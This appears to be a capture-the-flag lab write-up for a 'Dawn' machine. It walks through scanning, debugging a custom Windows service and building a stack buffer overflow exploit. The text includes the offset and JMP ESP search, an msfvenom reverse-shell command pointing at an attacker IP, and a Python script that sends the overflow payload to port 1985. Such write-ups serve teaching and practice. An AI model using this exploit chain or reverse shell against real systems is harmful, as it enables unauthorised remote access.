PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
1435/tcp closed ibm-cics
1985/tcp closed hsrp
We can download a dawn.zip from that here button, after unzipping we got a dawn.exe and
┌──(kali㉿kali)-[~/dawn]
└─$ cat README.txt
DAWN Multi Server - Version 1.1
Important:
Due the lack of implementation of the Dawn client, many issues may be experienced,
such as the message not being delivered.
In order to make sure the connection is finished and the message well received,
send a NULL-byte at the ending of your message.
Also, the service may crash after several requests.
Sorry for the inconvenience!
┌──(kali㉿kali)-[~/dawn]
└─$ file dawn.exe
dawn.exe: PE32 executable (console) Intel 80386, for MS Windows
Fire up Immunity Debugger and found out the port 1985 is running for this dawn.exe
┌──(kali㉿kali)-[~]
└─$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1985 0.0.0.0:* LISTEN 55655/wineserver32
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
msf-pattern_offset -l 1000 -q 316A4130
Finding JMP ESP address using mona script
!mona jmp -r esp -cpb "\\x00"
We have 2 addressess here and this works well:
\\xba\\x64\\x59\\x34
When we execute file dawn.exe we found out its 32 bits, thus x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.161 LPORT=80 EXITFUNC=thread -f c -b "\\x00"
#!/usr/bin/python2
import socket
shellcode = ()
offset = "A" * 272
eip = "\\xba\\x64\\x59\\x34"
nops = "\\x90" * 32
exploit = offset + eip + nops + shellcode
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.161.12", 1985))
s.send(exploit)
s.close()